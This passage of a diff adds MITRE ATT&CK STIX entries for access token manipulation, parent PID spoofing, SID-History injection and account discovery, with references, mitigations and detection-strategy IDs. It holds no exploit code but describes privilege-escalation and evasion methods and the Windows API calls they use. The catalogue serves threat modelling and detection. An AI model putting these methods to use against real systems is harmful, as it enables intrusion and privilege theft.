+                            "source_name": "CrowdStrike StellarParticle January 2022",
+                            "description": "CrowdStrike. (2022, January 27). Early Bird Catches the Wormhole: Observations from the StellarParticle Campaign. Retrieved February 7, 2022.",
+                            "url": "https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/"
+                        },
+                        {
+                            "source_name": "Google Cloud Just in Time Access 2023",
+                            "description": "Google Cloud. (n.d.). Manage just-in-time privileged access to projects. Retrieved September 21, 2023.",
+                            "url": "https://cloud.google.com/architecture/manage-just-in-time-privileged-access-to-project"
+                        },
+                        {
+                            "source_name": "Google Cloud Service Account Authentication Roles",
+                            "description": "Google Cloud. (n.d.). Roles for service account authentication. Retrieved July 10, 2023.",
+                            "url": "https://cloud.google.com/iam/docs/service-account-permissions"
+                        },
+                        {
+                            "source_name": "Microsoft Impersonation and EWS in Exchange",
+                            "description": "Microsoft. (2022, September 13). Impersonation and EWS in Exchange. Retrieved July 10, 2023.",
+                            "url": "https://learn.microsoft.com/en-us/exchange/client-developer/exchange-web-services/impersonation-and-ews-in-exchange"
+                        },
+                        {
+                            "source_name": "Azure Just in Time Access 2023",
+                            "description": "Microsoft. (2023, August 29). Configure and approve just-in-time access for Azure Managed Applications. Retrieved September 21, 2023.",
+                            "url": "https://learn.microsoft.com/en-us/azure/azure-resource-manager/managed-applications/approve-just-in-time-access"
+                        },
+                        {
+                            "source_name": "Rhino Security Labs AWS Privilege Escalation",
+                            "description": "Spencer Gietzen. (n.d.). AWS IAM Privilege Escalation \u2013 Methods and Mitigation. Retrieved May 27, 2022.",
+                            "url": "https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/"
+                        },
+                        {
+                            "source_name": "Rhino Google Cloud Privilege Escalation",
+                            "description": "Spencer Gietzen. (n.d.). Privilege Escalation in Google Cloud Platform \u2013 Part 1 (IAM). Retrieved September 21, 2023.",
+                            "url": "https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/"
+                        },
+                        {
+                            "source_name": "Hunters Domain Wide Delegation Google Workspace 2023",
+                            "description": "Yonatan Khanashvilli. (2023, November 28). DeleFriend: Severe design flaw in Domain Wide Delegation could leave Google Workspace vulnerable for takeover. Retrieved January 16, 2024.",
+                            "url": "https://www.hunters.security/en/blog/delefriend-a-newly-discovered-design-flaw-in-domain-wide-delegation-could-leave-google-workspace-vulnerable-for-takeover"
+                        },
+                        {
+                            "source_name": "Palo Alto Unit 42 Google Workspace Domain Wide Delegation 2023",
+                            "description": "Zohar Zigdon. (2023, November 30). Exploring a Critical Risk in Google Workspace's Domain-Wide Delegation Feature. Retrieved January 16, 2024.",
+                            "url": "https://unit42.paloaltonetworks.com/critical-risk-in-google-workspace-delegation-feature/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Arad Inbar, Fidelis Security"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "IaaS",
+                        "Office Suite",
+                        "Identity Provider"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.641000+00:00\", \"old_value\": \"2026-04-15 19:53:18.398000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1018: User Account Management"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0393: Detection Strategy for Temporary Elevated Cloud Access Abuse (T1548.005)"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--dcaa092b-7de9-4a21-977f-7fcb77e89c48",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-12-14 16:46:06.044000+00:00",
+                    "modified": "2026-05-12 15:12:00.722000+00:00",
+                    "name": "Access Token Manipulation",
+                    "description": "Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.\n\nAn adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. These token can then be applied to an existing process (i.e. [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001)) or used to spawn a new process (i.e. [Create Process with Token](https://attack.mitre.org/techniques/T1134/002)). An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level. An adversary can then use a token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system.(Citation: Pentestlab Token Manipulation)\n\nAny standard user can use the <code>runas</code> command, and the Windows API functions, to create impersonation tokens; it does not require access to an administrator account. There are also other mechanisms, such as Active Directory fields, that can be used to modify access tokens.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "privilege-escalation"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1134",
+                            "external_id": "T1134"
+                        },
+                        {
+                            "source_name": "Pentestlab Token Manipulation",
+                            "description": "netbiosX. (2017, April 3). Token Manipulation. Retrieved April 21, 2017.",
+                            "url": "https://pentestlab.blog/2017/04/03/token-manipulation/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Tom Ueltschi @c_APT_ure",
+                        "Travis Smith, Tripwire",
+                        "Robby Winchester, @robwinchester3",
+                        "Jared Atkinson, @jaredcatkinson"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "3.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.722000+00:00\", \"old_value\": \"2026-04-15 19:53:44.334000+00:00\"}}}",
+                    "previous_version": "3.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1018: User Account Management",
+                            "M1026: Privileged Account Management"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0283: Behavior-chain detection for T1134 Access Token Manipulation on Windows"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--677569f9-a8b0-459e-ab24-7f18091fa7bf",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-18 16:48:56.582000+00:00",
+                    "modified": "2026-05-12 15:12:00.639000+00:00",
+                    "name": "Create Process with Token",
+                    "description": "Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as <code>CreateProcessWithTokenW</code> and <code>runas</code>.(Citation: Microsoft RunAs)\n\nCreating processes with a token not associated with the current user may require the credentials of the target user, specific privileges to impersonate that user, or access to the token to be used. For example, the token could be duplicated via [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) or created via [Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003) before being used to create a process.\n\nWhile this technique is distinct from [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001), the techniques can be used in conjunction where a token is duplicated and then used to create a new process.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "privilege-escalation"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1134/002",
+                            "external_id": "T1134.002"
+                        },
+                        {
+                            "source_name": "Microsoft RunAs",
+                            "description": "Microsoft. (2016, August 31). Runas. Retrieved October 1, 2021.",
+                            "url": "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771525(v=ws.11)"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Jonny Johnson",
+                        "Vadim Khrykov"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.639000+00:00\", \"old_value\": \"2026-04-15 19:55:37.484000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1018: User Account Management",
+                            "M1026: Privileged Account Management"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0456: Behavior-chain detection for T1134.002 Create Process with Token (Windows)"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--8cdeb020-e31e-4f88-a582-f53dcfbda819",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-18 18:03:37.481000+00:00",
+                    "modified": "2026-05-12 15:12:00.705000+00:00",
+                    "name": "Make and Impersonate Token",
+                    "description": "Adversaries may make new tokens and impersonate users to escalate privileges and bypass access controls. For example, if an adversary has a username and password but the user is not logged onto the system the adversary can then create a logon session for the user using the `LogonUser` function.(Citation: LogonUserW function) The function will return a copy of the new session's access token and the adversary can use `SetThreadToken` to assign the token to a thread.\n\nThis behavior is distinct from [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) in that this refers to creating a new user token instead of stealing or duplicating an existing one.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "privilege-escalation"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1134/003",
+                            "external_id": "T1134.003"
+                        },
+                        {
+                            "source_name": "LogonUserW function",
+                            "description": "Microsoft. (2023, March 10). LogonUserW function (winbase.h). Retrieved January 8, 2024.",
+                            "url": "https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-logonuserw"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Jonny Johnson"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.705000+00:00\", \"old_value\": \"2026-04-15 19:56:16.233000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1018: User Account Management",
+                            "M1026: Privileged Account Management"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0498: Behavior\u2011chain detection for T1134.003 Make and Impersonate Token (Windows)"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--93591901-3172-4e94-abf8-6034ab26f44a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-18 18:22:41.448000+00:00",
+                    "modified": "2026-05-12 15:12:00.706000+00:00",
+                    "name": "Parent PID Spoofing",
+                    "description": "Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the <code>CreateProcess</code> API call, which supports a parameter that defines the PPID to use.(Citation: DidierStevens SelectMyParent Nov 2009) This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via <code>svchost.exe</code> or <code>consent.exe</code>) rather than the current user context.(Citation: Microsoft UAC Nov 2018)\n\nAdversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be <code>explorer.exe</code> rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)\n\nExplicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as <code>lsass.exe</code>), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "privilege-escalation"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1134/004",
+                            "external_id": "T1134.004"
+                        },
+                        {
+                            "source_name": "XPNSec PPID Nov 2017",
+                            "description": "Chester, A. (2017, November 20). Alternative methods of becoming SYSTEM. Retrieved June 4, 2019.",
+                            "url": "https://blog.xpnsec.com/becoming-system/"
+                        },
+                        {
+                            "source_name": "CounterCept PPID Spoofing Dec 2018",
+                            "description": "Loh, I. (2018, December 21). Detecting Parent PID Spoofing. Retrieved June 3, 2019.",
+                            "url": "https://web.archive.org/web/20200726110643/https://blog.f-secure.com/detecting-parent-pid-spoofing/"
+                        },
+                        {
+                            "source_name": "Microsoft UAC Nov 2018",
+                            "description": "Montemayor, D. et al.. (2018, November 15). How User Account Control works. Retrieved June 3, 2019.",
+                            "url": "https://docs.microsoft.com/windows/security/identity-protection/user-account-control/how-user-account-control-works"
+                        },
+                        {
+                            "source_name": "DidierStevens SelectMyParent Nov 2009",
+                            "description": "Stevens, D. (2009, November 22). Quickpost: SelectMyParent or Playing With the Windows Process Tree. Retrieved June 3, 2019.",
+                            "url": "https://blog.didierstevens.com/2009/11/22/quickpost-selectmyparent-or-playing-with-the-windows-process-tree/"
+                        },
+                        {
+                            "source_name": "CTD PPID Spoofing Macro Mar 2019",
+                            "description": "Tafani-Dereeper, C. (2019, March 12). Building an Office macro to spoof parent processes and command line arguments. Retrieved June 3, 2019.",
+                            "url": "https://blog.christophetd.fr/building-an-office-macro-to-spoof-process-parent-and-command-line/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Wayne Silva, F-Secure Countercept"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.706000+00:00\", \"old_value\": \"2026-04-15 19:54:42.976000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0489: Behavior-chain detection for T1134.004 Access Token Manipulation: Parent PID Spoofing (Windows)"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--b7dc639b-24cd-482d-a7f1-8897eda21023",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-18 18:34:49.414000+00:00",
+                    "modified": "2026-05-12 15:12:00.709000+00:00",
+                    "name": "SID-History Injection",
+                    "description": "Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).\n\nWith Domain Administrator (or equivalent) rights, harvested or well-known SID values (Citation: Microsoft Well Known SIDs Jun 2017) may be inserted into SID-History to enable impersonation of arbitrary users/groups such as Enterprise Administrators. This manipulation may result in elevated access to local resources and/or access to otherwise inaccessible domains via lateral movement techniques such as [Remote Services](https://attack.mitre.org/techniques/T1021), [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002), or [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006).",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "privilege-escalation"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1134/005",
+                            "external_id": "T1134.005"
+                        },
+                        {
+                            "source_name": "Microsoft Well Known SIDs Jun 2017",
+                            "description": "Microsoft. (2017, June 23). Well-known security identifiers in Windows operating systems. Retrieved November 30, 2017.",
+                            "url": "https://support.microsoft.com/help/243330/well-known-security-identifiers-in-windows-operating-systems"
+                        },
+                        {
+                            "source_name": "Microsoft SID-History Attribute",
+                            "description": "Microsoft. (n.d.). Active Directory Schema - SID-History attribute. Retrieved November 30, 2017.",
+                            "url": "https://msdn.microsoft.com/library/ms679833.aspx"
+                        },
+                        {
+                            "source_name": "Microsoft SID",
+                            "description": "Microsoft. (n.d.). Security Identifiers. Retrieved November 30, 2017.",
+                            "url": "https://msdn.microsoft.com/library/windows/desktop/aa379571.aspx"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Alain Homewood, Insomnia Security",
+                        "Vincent Le Toux"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.709000+00:00\", \"old_value\": \"2026-04-15 19:55:14.114000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1015: Active Directory Configuration"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0136: Behavior-chain detection for T1134.005 Access Token Manipulation: SID-History Injection (Windows)"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--86850eff-2729-40c3-b85e-c4af26da4a2d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-18 16:39:06.289000+00:00",
+                    "modified": "2026-05-12 15:12:00.686000+00:00",
+                    "name": "Token Impersonation/Theft",
+                    "description": "Adversaries may duplicate then impersonate another user's existing token to escalate privileges and bypass access controls. For example, an adversary can duplicate an existing token using `DuplicateToken` or `DuplicateTokenEx`.(Citation: DuplicateToken function) The token can then be used with `ImpersonateLoggedOnUser` to allow the calling thread to impersonate a logged on user's security context, or with `SetThreadToken` to assign the impersonated token to a thread.\n\nAn adversary may perform [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) when they have a specific, existing process they want to assign the duplicated token to. For example, this may be useful for when the target user has a non-network logon session on the system.\n\nWhen an adversary would instead use a duplicated token to create a new process rather than attaching to an existing process, they can additionally [Create Process with Token](https://attack.mitre.org/techniques/T1134/002) using `CreateProcessWithTokenW` or `CreateProcessAsUserW`. [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) is also distinct from [Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003) in that it refers to duplicating an existing token, rather than creating a new one.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "privilege-escalation"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1134/001",
+                            "external_id": "T1134.001"
+                        },
+                        {
+                            "source_name": "DuplicateToken function",
+                            "description": "Microsoft. (2021, October 12). DuplicateToken function (securitybaseapi.h). Retrieved January 8, 2024.",
+                            "url": "https://learn.microsoft.com/en-us/windows/win32/api/securitybaseapi/nf-securitybaseapi-duplicatetoken"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Jonny Johnson"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.686000+00:00\", \"old_value\": \"2026-04-15 19:54:20.663000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1018: User Account Management",
+                            "M1026: Privileged Account Management"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0482: Behavior-chain detection for T1134.001 Access Token Manipulation: Token Impersonation/Theft on Windows"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--72b74d71-8169-42aa-92e0-e7b04b9f5a08",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:31:06.988000+00:00",
+                    "modified": "2026-05-12 15:12:00.641000+00:00",
+                    "name": "Account Discovery",
+                    "description": "Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., [Valid Accounts](https://attack.mitre.org/techniques/T1078)).\n\nAdversaries may use several methods to enumerate accounts, including abuse of existing tools, built-in commands, and potential misconfigurations that leak account names and roles or permissions in the targeted environment.\n\nFor examples, cloud environments typically provide easily accessible interfaces to obtain user lists.(Citation: AWS List Users)(Citation: Google Cloud - IAM Servie Accounts List API) On hosts, adversaries can use default [PowerShell](https://attack.mitre.org/techniques/T1059/001) and other command line functionality to identify accounts. Information about email addresses and accounts may also be extracted by searching an infected system\u2019s files.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "discovery"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1087",
+                            "external_id": "T1087"
+                        },
+                        {
+                            "source_name": "AWS List Users",
+                            "description": "Amazon. (n.d.). List Users. Retrieved August 11, 2020.",
+                            "url": "https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html"
+                        },
+                        {
+                            "source_name": "Google Cloud - IAM Servie Accounts List API",
+                            "description": "Google. (2020, June 23). gcloud iam service-accounts list. Retrieved August 4, 2020.",
+                            "url": "https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list"
+                        },
+                        {
+                            "source_name": "Elastic - Koadiac Detection with EQL",
+                            "description": "Stepanic, D.. (2020, January 13). Embracing offensive tooling: Building detections against Koadic using EQL. Retrieved November 17, 2024.",
+                            "url": "https://www.elastic.co/security-labs/embracing-offensive-tooling-building-detections-against-koadic-using-eql"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Daniel Stepanic, Elastic",
+                        "Microsoft Threat Intelligence Center (MSTIC)",
+                        "Travis Smith, Tripwire"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "IaaS",
+                        "Identity Provider",
+                        "Linux",
+                        "macOS",
+                        "Office Suite",
+                        "SaaS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.6",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.641000+00:00\", \"old_value\": \"2025-10-24 17:48:57.239000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "2.6",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1018: User Account Management",
+                            "M1028: Operating System Configuration"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0587: Enumeration of User or Account Information Across Platforms"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--21875073-b0ee-49e3-9077-1e2a885359af",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-21 21:08:26.480000+00:00",
+                    "modified": "2026-05-12 15:12:00.622000+00:00",
+                    "name": "Domain Account",
